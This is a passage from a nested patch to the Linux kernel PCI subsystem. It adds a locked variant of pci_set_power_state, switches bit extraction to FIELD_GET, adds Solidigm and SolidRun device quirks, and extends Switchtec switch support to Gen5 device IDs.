+- * -EINVAL if the requested state is invalid.
+- * -EIO if device does not support PCI PM or its PM capabilities register has a
+- * wrong version, or device doesn't support the requested state.
+- * 0 if the transition is to D1 or D2 but D1 and D2 are not supported.
+- * 0 if device already is in the requested state.
+- * 0 if the transition is to D3 but D3 is not supported.
+- * 0 if device's power state has been successfully changed.
+- */
+-int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
++static int __pci_set_power_state(struct pci_dev *dev, pci_power_t state, bool locked)
+ {
+ 	int error;
+ 
+@@ -1446,7 +1442,7 @@ int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 		return 0;
+ 
+ 	if (state == PCI_D0)
+-		return pci_set_full_power_state(dev);
++		return pci_set_full_power_state(dev, locked);
+ 
+ 	/*
+ 	 * This device is quirked not to be put into D3, so don't put it in
+@@ -1460,16 +1456,16 @@ int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 		 * To put the device in D3cold, put it into D3hot in the native
+ 		 * way, then put it into D3cold using platform ops.
+ 		 */
+-		error = pci_set_low_power_state(dev, PCI_D3hot);
++		error = pci_set_low_power_state(dev, PCI_D3hot, locked);
+ 
+ 		if (pci_platform_power_transition(dev, PCI_D3cold))
+ 			return error;
+ 
+ 		/* Powering off a bridge may power off the whole hierarchy */
+ 		if (dev->current_state == PCI_D3cold)
+-			pci_bus_set_current_state(dev->subordinate, PCI_D3cold);
++			__pci_bus_set_current_state(dev->subordinate, PCI_D3cold, locked);
+ 	} else {
+-		error = pci_set_low_power_state(dev, state);
++		error = pci_set_low_power_state(dev, state, locked);
+ 
+ 		if (pci_platform_power_transition(dev, state))
+ 			return error;
+@@ -1477,8 +1473,38 @@ int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ 
+ 	return 0;
+ }
++
++/**
++ * pci_set_power_state - Set the power state of a PCI device
++ * @dev: PCI device to handle.
++ * @state: PCI power state (D0, D1, D2, D3hot) to put the device into.
++ *
++ * Transition a device to a new power state, using the platform firmware and/or
++ * the device's PCI PM registers.
++ *
++ * RETURN VALUE:
++ * -EINVAL if the requested state is invalid.
++ * -EIO if device does not support PCI PM or its PM capabilities register has a
++ * wrong version, or device doesn't support the requested state.
++ * 0 if the transition is to D1 or D2 but D1 and D2 are not supported.
++ * 0 if device already is in the requested state.
++ * 0 if the transition is to D3 but D3 is not supported.
++ * 0 if device's power state has been successfully changed.
++ */
++int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
++{
++	return __pci_set_power_state(dev, state, false);
++}
+ EXPORT_SYMBOL(pci_set_power_state);
+ 
++int pci_set_power_state_locked(struct pci_dev *dev, pci_power_t state)
++{
++	lockdep_assert_held(&pci_bus_sem);
++
++	return __pci_set_power_state(dev, state, true);
++}
++EXPORT_SYMBOL(pci_set_power_state_locked);
++
+ #define PCI_EXP_SAVE_REGS	7
+ 
+ static struct pci_cap_saved_state *_pci_find_saved_cap(struct pci_dev *pci_dev,
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index 9950deeb047a7..88576a22fecb1 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -556,12 +556,12 @@ bool pcie_wait_for_link(struct pci_dev *pdev, bool active);
+ #ifdef CONFIG_PCIEASPM
+ void pcie_aspm_init_link_state(struct pci_dev *pdev);
+ void pcie_aspm_exit_link_state(struct pci_dev *pdev);
+-void pcie_aspm_pm_state_change(struct pci_dev *pdev);
++void pcie_aspm_pm_state_change(struct pci_dev *pdev, bool locked);
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev);
+ #else
+ static inline void pcie_aspm_init_link_state(struct pci_dev *pdev) { }
+ static inline void pcie_aspm_exit_link_state(struct pci_dev *pdev) { }
+-static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev) { }
++static inline void pcie_aspm_pm_state_change(struct pci_dev *pdev, bool locked) { }
+ static inline void pcie_aspm_powersave_config_link(struct pci_dev *pdev) { }
+ #endif
+ 
+diff --git a/drivers/pci/pcie/aspm.c b/drivers/pci/pcie/aspm.c
+index 25736d408e88e..cf4acea6610d5 100644
+--- a/drivers/pci/pcie/aspm.c
++++ b/drivers/pci/pcie/aspm.c
+@@ -743,10 +743,10 @@ static void pcie_config_aspm_l1ss(struct pcie_link_state *link, u32 state)
+ 	 * in pcie_config_aspm_link().
+ 	 */
+ 	if (enable_req & (ASPM_STATE_L1_1 | ASPM_STATE_L1_2)) {
+-		pcie_capability_clear_and_set_word(child, PCI_EXP_LNKCTL,
+-						   PCI_EXP_LNKCTL_ASPM_L1, 0);
+-		pcie_capability_clear_and_set_word(parent, PCI_EXP_LNKCTL,
+-						   PCI_EXP_LNKCTL_ASPM_L1, 0);
++		pcie_capability_clear_word(child, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPM_L1);
++		pcie_capability_clear_word(parent, PCI_EXP_LNKCTL,
++					   PCI_EXP_LNKCTL_ASPM_L1);
+ 	}
+ 
+ 	val = 0;
+@@ -1055,8 +1055,11 @@ void pcie_aspm_exit_link_state(struct pci_dev *pdev)
+ 	up_read(&pci_bus_sem);
+ }
+ 
+-/* @pdev: the root port or switch downstream port */
+-void pcie_aspm_pm_state_change(struct pci_dev *pdev)
++/*
++ * @pdev: the root port or switch downstream port
++ * @locked: whether pci_bus_sem is held
++ */
++void pcie_aspm_pm_state_change(struct pci_dev *pdev, bool locked)
+ {
+ 	struct pcie_link_state *link = pdev->link_state;
+ 
+@@ -1066,12 +1069,14 @@ void pcie_aspm_pm_state_change(struct pci_dev *pdev)
+ 	 * Devices changed PM state, we should recheck if latency
+ 	 * meets all functions' requirement
+ 	 */
+-	down_read(&pci_bus_sem);
++	if (!locked)
++		down_read(&pci_bus_sem);
+ 	mutex_lock(&aspm_lock);
+ 	pcie_update_aspm_capable(link->root);
+ 	pcie_config_aspm_path(link);
+ 	mutex_unlock(&aspm_lock);
+-	up_read(&pci_bus_sem);
++	if (!locked)
++		up_read(&pci_bus_sem);
+ }
+ 
+ void pcie_aspm_powersave_config_link(struct pci_dev *pdev)
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index 08800282825e1..acdbf9e770a8a 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -9,6 +9,7 @@
+ #define dev_fmt(fmt) "DPC: " fmt
+ 
+ #include <linux/aer.h>
++#include <linux/bitfield.h>
+ #include <linux/delay.h>
+ #include <linux/interrupt.h>
+ #include <linux/init.h>
+@@ -203,7 +204,7 @@ static void dpc_process_rp_pio_error(struct pci_dev *pdev)
+ 
+ 	/* Get First Error Pointer */
+ 	pci_read_config_word(pdev, cap + PCI_EXP_DPC_STATUS, &dpc_status);
+-	first_error = (dpc_status & 0x1f00) >> 8;
++	first_error = FIELD_GET(PCI_EXP_DPC_RP_PIO_FEP, dpc_status);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(rp_pio_error_string); i++) {
+ 		if ((status & ~mask) & (1 << i))
+@@ -339,7 +340,7 @@ void pci_dpc_init(struct pci_dev *pdev)
+ 	/* Quirks may set dpc_rp_log_size if device or firmware is buggy */
+ 	if (!pdev->dpc_rp_log_size) {
+ 		pdev->dpc_rp_log_size =
+-			(cap & PCI_EXP_DPC_RP_PIO_LOG_SIZE) >> 8;
++				FIELD_GET(PCI_EXP_DPC_RP_PIO_LOG_SIZE, cap);
+ 		if (pdev->dpc_rp_log_size < 4 || pdev->dpc_rp_log_size > 9) {
+ 			pci_err(pdev, "RP PIO log size %u is invalid\n",
+ 				pdev->dpc_rp_log_size);
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 289ba6902e41b..56dce858a6934 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -2425,9 +2425,9 @@ static void quirk_enable_clear_retrain_link(struct pci_dev *dev)
+ 	dev->clear_retrain_link = 1;
+ 	pci_info(dev, "Enable PCIe Retrain Link quirk\n");
+ }
+-DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_PERICOM, 0xe110, quirk_enable_clear_retrain_link);
+-DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_PERICOM, 0xe111, quirk_enable_clear_retrain_link);
+-DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_PERICOM, 0xe130, quirk_enable_clear_retrain_link);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_PERICOM, 0xe110, quirk_enable_clear_retrain_link);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_PERICOM, 0xe111, quirk_enable_clear_retrain_link);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_PERICOM, 0xe130, quirk_enable_clear_retrain_link);
+ 
+ static void fixup_rev1_53c810(struct pci_dev *dev)
+ {
+@@ -4011,10 +4011,11 @@ static int nvme_disable_and_flr(struct pci_dev *dev, bool probe)
+ }
+ 
+ /*
+- * Intel DC P3700 NVMe controller will timeout waiting for ready status
+- * to change after NVMe enable if the driver starts interacting with the
+- * device too soon after FLR.  A 250ms delay after FLR has heuristically
+- * proven to produce reliably working results for device assignment cases.
++ * Some NVMe controllers such as Intel DC P3700 and Solidigm P44 Pro will
++ * timeout waiting for ready status to change after NVMe enable if the driver
++ * starts interacting with the device too soon after FLR.  A 250ms delay after
++ * FLR has heuristically proven to produce reliably working results for device
++ * assignment cases.
+  */
+ static int delay_250ms_after_flr(struct pci_dev *dev, bool probe)
+ {
+@@ -4101,6 +4102,7 @@ static const struct pci_dev_reset_methods pci_dev_reset_methods[] = {
+ 	{ PCI_VENDOR_ID_SAMSUNG, 0xa804, nvme_disable_and_flr },
+ 	{ PCI_VENDOR_ID_INTEL, 0x0953, delay_250ms_after_flr },
+ 	{ PCI_VENDOR_ID_INTEL, 0x0a54, delay_250ms_after_flr },
++	{ PCI_VENDOR_ID_SOLIDIGM, 0xf1ac, delay_250ms_after_flr },
+ 	{ PCI_VENDOR_ID_CHELSIO, PCI_ANY_ID,
+ 		reset_chelsio_generic_dev },
+ 	{ PCI_VENDOR_ID_HUAWEI, PCI_DEVICE_ID_HINIC_VF,
+@@ -4474,9 +4476,9 @@ static void quirk_disable_root_port_attributes(struct pci_dev *pdev)
+ 
+ 	pci_info(root_port, "Disabling No Snoop/Relaxed Ordering Attributes to avoid PCIe Completion erratum in %s\n",
+ 		 dev_name(&pdev->dev));
+-	pcie_capability_clear_and_set_word(root_port, PCI_EXP_DEVCTL,
+-					   PCI_EXP_DEVCTL_RELAX_EN |
+-					   PCI_EXP_DEVCTL_NOSNOOP_EN, 0);
++	pcie_capability_clear_word(root_port, PCI_EXP_DEVCTL,
++				   PCI_EXP_DEVCTL_RELAX_EN |
++				   PCI_EXP_DEVCTL_NOSNOOP_EN);
+ }
+ 
+ /*
+@@ -5403,6 +5405,14 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x7901, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1502, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1503, quirk_no_flr);
+ 
++/* FLR may cause the SolidRun SNET DPU (rev 0x1) to hang */
++static void quirk_no_flr_snet(struct pci_dev *dev)
++{
++	if (dev->revision == 0x1)
++		quirk_no_flr(dev);
++}
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_SOLIDRUN, 0x1000, quirk_no_flr_snet);
++
+ static void quirk_no_ext_tags(struct pci_dev *pdev)
+ {
+ 	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
+@@ -5808,6 +5818,42 @@ SWITCHTEC_QUIRK(0x4428);  /* PSXA 28XG4 */
+ SWITCHTEC_QUIRK(0x4552);  /* PAXA 52XG4 */
+ SWITCHTEC_QUIRK(0x4536);  /* PAXA 36XG4 */
+ SWITCHTEC_QUIRK(0x4528);  /* PAXA 28XG4 */
++SWITCHTEC_QUIRK(0x5000);  /* PFX 100XG5 */
++SWITCHTEC_QUIRK(0x5084);  /* PFX 84XG5 */
++SWITCHTEC_QUIRK(0x5068);  /* PFX 68XG5 */
++SWITCHTEC_QUIRK(0x5052);  /* PFX 52XG5 */
++SWITCHTEC_QUIRK(0x5036);  /* PFX 36XG5 */
++SWITCHTEC_QUIRK(0x5028);  /* PFX 28XG5 */
++SWITCHTEC_QUIRK(0x5100);  /* PSX 100XG5 */
++SWITCHTEC_QUIRK(0x5184);  /* PSX 84XG5 */
++SWITCHTEC_QUIRK(0x5168);  /* PSX 68XG5 */
++SWITCHTEC_QUIRK(0x5152);  /* PSX 52XG5 */
++SWITCHTEC_QUIRK(0x5136);  /* PSX 36XG5 */
++SWITCHTEC_QUIRK(0x5128);  /* PSX 28XG5 */
++SWITCHTEC_QUIRK(0x5200);  /* PAX 100XG5 */
++SWITCHTEC_QUIRK(0x5284);  /* PAX 84XG5 */
++SWITCHTEC_QUIRK(0x5268);  /* PAX 68XG5 */
++SWITCHTEC_QUIRK(0x5252);  /* PAX 52XG5 */
++SWITCHTEC_QUIRK(0x5236);  /* PAX 36XG5 */
++SWITCHTEC_QUIRK(0x5228);  /* PAX 28XG5 */
++SWITCHTEC_QUIRK(0x5300);  /* PFXA 100XG5 */
++SWITCHTEC_QUIRK(0x5384);  /* PFXA 84XG5 */
++SWITCHTEC_QUIRK(0x5368);  /* PFXA 68XG5 */
++SWITCHTEC_QUIRK(0x5352);  /* PFXA 52XG5 */
++SWITCHTEC_QUIRK(0x5336);  /* PFXA 36XG5 */
++SWITCHTEC_QUIRK(0x5328);  /* PFXA 28XG5 */
++SWITCHTEC_QUIRK(0x5400);  /* PSXA 100XG5 */
++SWITCHTEC_QUIRK(0x5484);  /* PSXA 84XG5 */
++SWITCHTEC_QUIRK(0x5468);  /* PSXA 68XG5 */
++SWITCHTEC_QUIRK(0x5452);  /* PSXA 52XG5 */
++SWITCHTEC_QUIRK(0x5436);  /* PSXA 36XG5 */
++SWITCHTEC_QUIRK(0x5428);  /* PSXA 28XG5 */
++SWITCHTEC_QUIRK(0x5500);  /* PAXA 100XG5 */
++SWITCHTEC_QUIRK(0x5584);  /* PAXA 84XG5 */
++SWITCHTEC_QUIRK(0x5568);  /* PAXA 68XG5 */
++SWITCHTEC_QUIRK(0x5552);  /* PAXA 52XG5 */
++SWITCHTEC_QUIRK(0x5536);  /* PAXA 36XG5 */
++SWITCHTEC_QUIRK(0x5528);  /* PAXA 28XG5 */
+ 
+ /*
+  * The PLX NTB uses devfn proxy IDs to move TLPs between NT endpoints.
+@@ -6057,7 +6103,7 @@ static void dpc_log_size(struct pci_dev *dev)
+ 	if (!(val & PCI_EXP_DPC_CAP_RP_EXT))
+ 		return;
+ 
+-	if (!((val & PCI_EXP_DPC_RP_PIO_LOG_SIZE) >> 8)) {
++	if (FIELD_GET(PCI_EXP_DPC_RP_PIO_LOG_SIZE, val) == 0) {
+ 		pci_info(dev, "Overriding RP PIO Log Size to 4\n");
+ 		dev->dpc_rp_log_size = 4;
+ 	}
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index d05a482639e3c..332af6938d7fd 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -372,7 +372,7 @@ static ssize_t field ## _show(struct device *dev, \
+ 	if (stdev->gen == SWITCHTEC_GEN3) \
+ 		return io_string_show(buf, &si->gen3.field, \
+ 				      sizeof(si->gen3.field)); \
+-	else if (stdev->gen == SWITCHTEC_GEN4) \
++	else if (stdev->gen >= SWITCHTEC_GEN4) \
+ 		return io_string_show(buf, &si->gen4.field, \
+ 				      sizeof(si->gen4.field)); \
+ 	else \
+@@ -663,7 +663,7 @@ static int ioctl_flash_info(struct switchtec_dev *stdev,
+ 	if (stdev->gen == SWITCHTEC_GEN3) {
+ 		info.flash_length = ioread32(&fi->gen3.flash_length);
+ 		info.num_partitions = SWITCHTEC_NUM_PARTITIONS_GEN3;
+-	} else if (stdev->gen == SWITCHTEC_GEN4) {
++	} else if (stdev->gen >= SWITCHTEC_GEN4) {
+ 		info.flash_length = ioread32(&fi->gen4.flash_length);
+ 		info.num_partitions = SWITCHTEC_NUM_PARTITIONS_GEN4;
+ 	} else {
+@@ -870,7 +870,7 @@ static int ioctl_flash_part_info(struct switchtec_dev *stdev,
+ 		ret = flash_part_info_gen3(stdev, &info);
+ 		if (ret)
+ 			return ret;
+-	} else if (stdev->gen == SWITCHTEC_GEN4) {
++	} else if (stdev->gen >= SWITCHTEC_GEN4) {
+ 		ret = flash_part_info_gen4(stdev, &info);
+ 		if (ret)
+ 			return ret;
+@@ -1606,7 +1606,7 @@ static int switchtec_init_pci(struct switchtec_dev *stdev,
+ 
+ 	if (stdev->gen == SWITCHTEC_GEN3)
+ 		part_id = &stdev->mmio_sys_info->gen3.partition_id;
+-	else if (stdev->gen == SWITCHTEC_GEN4)
++	else if (stdev->gen >= SWITCHTEC_GEN4)
+ 		part_id = &stdev->mmio_sys_info->gen4.partition_id;
+ 	else
+ 		return -EOPNOTSUPP;
+@@ -1740,63 +1740,99 @@ static void switchtec_pci_remove(struct pci_dev *pdev)
+ 	}
+ 
+ static const struct pci_device_id switchtec_pci_tbl[] = {
+-	SWITCHTEC_PCI_DEVICE(0x8531, SWITCHTEC_GEN3),  //PFX 24xG3
+-	SWITCHTEC_PCI_DEVICE(0x8532, SWITCHTEC_GEN3),  //PFX 32xG3
+-	SWITCHTEC_PCI_DEVICE(0x8533, SWITCHTEC_GEN3),  //PFX 48xG3
+-	SWITCHTEC_PCI_DEVICE(0x8534, SWITCHTEC_GEN3),  //PFX 64xG3
+-	SWITCHTEC_PCI_DEVICE(0x8535, SWITCHTEC_GEN3),  //PFX 80xG3
+-	SWITCHTEC_PCI_DEVICE(0x8536, SWITCHTEC_GEN3),  //PFX 96xG3
+-	SWITCHTEC_PCI_DEVICE(0x8541, SWITCHTEC_GEN3),  //PSX 24xG3
+-	SWITCHTEC_PCI_DEVICE(0x8542, SWITCHTEC_GEN3),  //PSX 32xG3
+-	SWITCHTEC_PCI_DEVICE(0x8543, SWITCHTEC_GEN3),  //PSX 48xG3
+-	SWITCHTEC_PCI_DEVICE(0x8544, SWITCHTEC_GEN3),  //PSX 64xG3
+-	SWITCHTEC_PCI_DEVICE(0x8545, SWITCHTEC_GEN3),  //PSX 80xG3
+-	SWITCHTEC_PCI_DEVICE(0x8546, SWITCHTEC_GEN3),  //PSX 96xG3
+-	SWITCHTEC_PCI_DEVICE(0x8551, SWITCHTEC_GEN3),  //PAX 24XG3
+-	SWITCHTEC_PCI_DEVICE(0x8552, SWITCHTEC_GEN3),  //PAX 32XG3
+-	SWITCHTEC_PCI_DEVICE(0x8553, SWITCHTEC_GEN3),  //PAX 48XG3
+-	SWITCHTEC_PCI_DEVICE(0x8554, SWITCHTEC_GEN3),  //PAX 64XG3
+-	SWITCHTEC_PCI_DEVICE(0x8555, SWITCHTEC_GEN3),  //PAX 80XG3
+-	SWITCHTEC_PCI_DEVICE(0x8556, SWITCHTEC_GEN3),  //PAX 96XG3
+-	SWITCHTEC_PCI_DEVICE(0x8561, SWITCHTEC_GEN3),  //PFXL 24XG3
+-	SWITCHTEC_PCI_DEVICE(0x8562, SWITCHTEC_GEN3),  //PFXL 32XG3
+-	SWITCHTEC_PCI_DEVICE(0x8563, SWITCHTEC_GEN3),  //PFXL 48XG3
+-	SWITCHTEC_PCI_DEVICE(0x8564, SWITCHTEC_GEN3),  //PFXL 64XG3
+-	SWITCHTEC_PCI_DEVICE(0x8565, SWITCHTEC_GEN3),  //PFXL 80XG3
+-	SWITCHTEC_PCI_DEVICE(0x8566, SWITCHTEC_GEN3),  //PFXL 96XG3
+-	SWITCHTEC_PCI_DEVICE(0x8571, SWITCHTEC_GEN3),  //PFXI 24XG3
+-	SWITCHTEC_PCI_DEVICE(0x8572, SWITCHTEC_GEN3),  //PFXI 32XG3
+-	SWITCHTEC_PCI_DEVICE(0x8573, SWITCHTEC_GEN3),  //PFXI 48XG3
+-	SWITCHTEC_PCI_DEVICE(0x8574, SWITCHTEC_GEN3),  //PFXI 64XG3
+-	SWITCHTEC_PCI_DEVICE(0x8575, SWITCHTEC_GEN3),  //PFXI 80XG3
+-	SWITCHTEC_PCI_DEVICE(0x8576, SWITCHTEC_GEN3),  //PFXI 96XG3
+-	SWITCHTEC_PCI_DEVICE(0x4000, SWITCHTEC_GEN4),  //PFX 100XG4
+-	SWITCHTEC_PCI_DEVICE(0x4084, SWITCHTEC_GEN4),  //PFX 84XG4
+-	SWITCHTEC_PCI_DEVICE(0x4068, SWITCHTEC_GEN4),  //PFX 68XG4
+-	SWITCHTEC_PCI_DEVICE(0x4052, SWITCHTEC_GEN4),  //PFX 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4036, SWITCHTEC_GEN4),  //PFX 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4028, SWITCHTEC_GEN4),  //PFX 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4100, SWITCHTEC_GEN4),  //PSX 100XG4
+-	SWITCHTEC_PCI_DEVICE(0x4184, SWITCHTEC_GEN4),  //PSX 84XG4
+-	SWITCHTEC_PCI_DEVICE(0x4168, SWITCHTEC_GEN4),  //PSX 68XG4
+-	SWITCHTEC_PCI_DEVICE(0x4152, SWITCHTEC_GEN4),  //PSX 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4136, SWITCHTEC_GEN4),  //PSX 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4128, SWITCHTEC_GEN4),  //PSX 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4200, SWITCHTEC_GEN4),  //PAX 100XG4
+-	SWITCHTEC_PCI_DEVICE(0x4284, SWITCHTEC_GEN4),  //PAX 84XG4
+-	SWITCHTEC_PCI_DEVICE(0x4268, SWITCHTEC_GEN4),  //PAX 68XG4
+-	SWITCHTEC_PCI_DEVICE(0x4252, SWITCHTEC_GEN4),  //PAX 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4236, SWITCHTEC_GEN4),  //PAX 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4228, SWITCHTEC_GEN4),  //PAX 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4352, SWITCHTEC_GEN4),  //PFXA 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4336, SWITCHTEC_GEN4),  //PFXA 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4328, SWITCHTEC_GEN4),  //PFXA 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4452, SWITCHTEC_GEN4),  //PSXA 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4436, SWITCHTEC_GEN4),  //PSXA 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4428, SWITCHTEC_GEN4),  //PSXA 28XG4
+-	SWITCHTEC_PCI_DEVICE(0x4552, SWITCHTEC_GEN4),  //PAXA 52XG4
+-	SWITCHTEC_PCI_DEVICE(0x4536, SWITCHTEC_GEN4),  //PAXA 36XG4
+-	SWITCHTEC_PCI_DEVICE(0x4528, SWITCHTEC_GEN4),  //PAXA 28XG4
++	SWITCHTEC_PCI_DEVICE(0x8531, SWITCHTEC_GEN3),  /* PFX 24xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8532, SWITCHTEC_GEN3),  /* PFX 32xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8533, SWITCHTEC_GEN3),  /* PFX 48xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8534, SWITCHTEC_GEN3),  /* PFX 64xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8535, SWITCHTEC_GEN3),  /* PFX 80xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8536, SWITCHTEC_GEN3),  /* PFX 96xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8541, SWITCHTEC_GEN3),  /* PSX 24xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8542, SWITCHTEC_GEN3),  /* PSX 32xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8543, SWITCHTEC_GEN3),  /* PSX 48xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8544, SWITCHTEC_GEN3),  /* PSX 64xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8545, SWITCHTEC_GEN3),  /* PSX 80xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8546, SWITCHTEC_GEN3),  /* PSX 96xG3 */
++	SWITCHTEC_PCI_DEVICE(0x8551, SWITCHTEC_GEN3),  /* PAX 24XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8552, SWITCHTEC_GEN3),  /* PAX 32XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8553, SWITCHTEC_GEN3),  /* PAX 48XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8554, SWITCHTEC_GEN3),  /* PAX 64XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8555, SWITCHTEC_GEN3),  /* PAX 80XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8556, SWITCHTEC_GEN3),  /* PAX 96XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8561, SWITCHTEC_GEN3),  /* PFXL 24XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8562, SWITCHTEC_GEN3),  /* PFXL 32XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8563, SWITCHTEC_GEN3),  /* PFXL 48XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8564, SWITCHTEC_GEN3),  /* PFXL 64XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8565, SWITCHTEC_GEN3),  /* PFXL 80XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8566, SWITCHTEC_GEN3),  /* PFXL 96XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8571, SWITCHTEC_GEN3),  /* PFXI 24XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8572, SWITCHTEC_GEN3),  /* PFXI 32XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8573, SWITCHTEC_GEN3),  /* PFXI 48XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8574, SWITCHTEC_GEN3),  /* PFXI 64XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8575, SWITCHTEC_GEN3),  /* PFXI 80XG3 */
++	SWITCHTEC_PCI_DEVICE(0x8576, SWITCHTEC_GEN3),  /* PFXI 96XG3 */
++	SWITCHTEC_PCI_DEVICE(0x4000, SWITCHTEC_GEN4),  /* PFX 100XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4084, SWITCHTEC_GEN4),  /* PFX 84XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4068, SWITCHTEC_GEN4),  /* PFX 68XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4052, SWITCHTEC_GEN4),  /* PFX 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4036, SWITCHTEC_GEN4),  /* PFX 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4028, SWITCHTEC_GEN4),  /* PFX 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4100, SWITCHTEC_GEN4),  /* PSX 100XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4184, SWITCHTEC_GEN4),  /* PSX 84XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4168, SWITCHTEC_GEN4),  /* PSX 68XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4152, SWITCHTEC_GEN4),  /* PSX 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4136, SWITCHTEC_GEN4),  /* PSX 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4128, SWITCHTEC_GEN4),  /* PSX 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4200, SWITCHTEC_GEN4),  /* PAX 100XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4284, SWITCHTEC_GEN4),  /* PAX 84XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4268, SWITCHTEC_GEN4),  /* PAX 68XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4252, SWITCHTEC_GEN4),  /* PAX 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4236, SWITCHTEC_GEN4),  /* PAX 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4228, SWITCHTEC_GEN4),  /* PAX 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4352, SWITCHTEC_GEN4),  /* PFXA 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4336, SWITCHTEC_GEN4),  /* PFXA 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4328, SWITCHTEC_GEN4),  /* PFXA 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4452, SWITCHTEC_GEN4),  /* PSXA 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4436, SWITCHTEC_GEN4),  /* PSXA 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4428, SWITCHTEC_GEN4),  /* PSXA 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4552, SWITCHTEC_GEN4),  /* PAXA 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4536, SWITCHTEC_GEN4),  /* PAXA 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4528, SWITCHTEC_GEN4),  /* PAXA 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x5000, SWITCHTEC_GEN5),  /* PFX 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5084, SWITCHTEC_GEN5),  /* PFX 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5068, SWITCHTEC_GEN5),  /* PFX 68XG5 */
